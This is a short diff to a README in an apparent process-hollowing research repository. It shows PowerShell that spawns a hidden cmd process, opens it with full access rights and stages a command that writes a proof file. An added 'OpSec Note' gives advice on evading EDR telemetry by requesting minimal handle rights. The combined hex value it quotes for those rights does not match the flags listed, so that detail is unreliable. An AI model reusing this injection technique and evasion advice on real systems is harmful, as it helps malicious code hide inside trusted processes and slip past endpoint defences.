rmsairlock/Process-Hallowing/README.md

 # 1. Targeting the Trusted Identity
 $Victim = Start-Process cmd -WindowStyle Hidden -PassThru
 $h = [Researcher]::Gate1(0x1F0FFF, $false, $Victim.Id)
+> **OpSec Note:** `0x1F0FFF` is `PROCESS_ALL_ACCESS` - maximum rights on the victim handle.
+This is a high-signal IOC; any competent EDR or kernel sensor watching handle acquisition will flag it.
+A more evasive approach requests only the minimum required rights: `PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD` (`0x000008`).
+For this research, full access was intentional - the goal was demonstrating the hallow, not evading telemetry.

 # 2. Memory Staging
 $Command = "cmd.exe /c echo Breach_Verified > C:\Users\Public\hallowed.txt"